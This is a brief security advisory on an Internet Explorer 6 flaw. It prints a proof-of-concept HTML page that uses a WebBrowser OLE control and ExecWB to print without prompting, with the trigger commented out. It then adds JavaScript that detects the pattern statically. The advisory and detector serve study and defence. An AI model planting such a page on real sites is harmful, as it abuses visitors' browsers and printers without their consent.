Bookmarks Online

Internet Explorer Print without Prompting

June 13th, 2006

Vulnerable Systems:
* Internet Explorer version 6

Using an OLE object, JavaScript, and HTML, a malicious document can make IE 6 send pages to the printer without prompting the user. An example page that exploits the vulnerability is given below. The offending line is commented out and must be uncommented for the page to work, and any line breaks that break the JavaScript code must be removed.

<html>
<head>
<script language="JavaScript">
function ieExecWB( intOLEcmd, intOLEparam )
{
    // Create OLE Object
    var WebBrowser = '<object ID="WebBrowser1" WIDTH=0 HEIGHT=0
    CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></object>';

    // Place Object on page
    document.body.insertAdjacentHTML('beforeEnd', WebBrowser);

    // if intOLEparam is not defined, set it
    if ( ( ! intOLEparam ) || ( intOLEparam < -1 ) || ( intOLEparam > 1) )
        intOLEparam = 1;

    // Execute Object
    WebBrowser1.ExecWB( intOLEcmd, intOLEparam );

    // Destroy Object
    WebBrowser1.outerHTML = "";
}

function printAll()
{
    // Uncomment this to enable the exploit!
    //ieExecWB(6,-1);
}
</script>
</head>
<body onload="printAll()">
<h3>I like your PRINTER</h3>
</body>
</html>
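
For content filtering or triage, the pattern in the page above can be recognised statically: an embedded WebBrowser control with this CLSID plus an ExecWB call whose command argument is 6, either directly or through a wrapper such as ieExecWB. The following is an added example, not part of the original advisory; the function names are hypothetical, the sample fragments are constructed, and the matching is a regex heuristic that follows only one level of wrapper function.

```javascript
// Added example: static check for the silent-print pattern described above.
// The CLSID and ExecWB come from the page; every function name is hypothetical.
const WEBBROWSER_CLSID = /CLSID:\s*8856F961-340A-11D0-A96B-00C04FD705A2/i;
const OLECMDID_PRINT = 6; // first argument of the page's ieExecWB(6,-1) call

// Drop block comments and whole-line // comments so disabled calls are ignored.
function stripComments(src) {
  return src.replace(/\/\*[\s\S]*?\*\//g, "").replace(/^[ \t]*\/\/.*$/gm, "");
}

// Report ExecWB print calls, direct or through a one-level wrapper function.
function findSilentPrint(html) {
  const src = stripComments(html);
  const findings = [];
  if (!WEBBROWSER_CLSID.test(src)) return findings; // no WebBrowser control
  for (const m of src.matchAll(/\.ExecWB\s*\(\s*([^,)]+)/g)) {
    const arg = m[1].trim();
    if (Number(arg) === OLECMDID_PRINT) {
      findings.push({ via: "direct", call: m[0] });
      continue;
    }
    // arg is an identifier: treat the nearest preceding function as its wrapper.
    const decls = [...src.slice(0, m.index).matchAll(/function\s+(\w+)\s*\(([^)]*)\)/g)];
    if (decls.length === 0) continue;
    const [, name, params] = decls[decls.length - 1];
    const idx = params.split(",").map((p) => p.trim()).indexOf(arg);
    if (idx < 0) continue;
    // Callers of the wrapper, skipping its own declaration.
    const callers = new RegExp("(?<!function\\s+)\\b" + name + "\\s*\\(([^)]*)\\)", "g");
    for (const c of src.matchAll(callers)) {
      const args = c[1].split(",").map((a) => a.trim());
      if (Number(args[idx]) === OLECMDID_PRINT) findings.push({ via: name, call: c[0] });
    }
  }
  return findings;
}

// Constructed, non-functional fragments modelled on the page's example.
const SAMPLE_ACTIVE = `<script>
function ieExecWB(intOLEcmd, intOLEparam) {
  var WebBrowser = '<object ID="WebBrowser1" CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></object>';
  WebBrowser1.ExecWB(intOLEcmd, intOLEparam);
}
function printAll() { ieExecWB(6, -1); }
</script>`;
const SAMPLE_DISABLED = SAMPLE_ACTIVE.replace("ieExecWB(6, -1);", "\n//ieExecWB(6,-1);\n");

console.log(findSilentPrint(SAMPLE_ACTIVE), findSilentPrint(SAMPLE_DISABLED));
```

A page that builds the call with string concatenation or eval will not match, so a hit is a reason to inspect the page and a miss is not a clearance.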
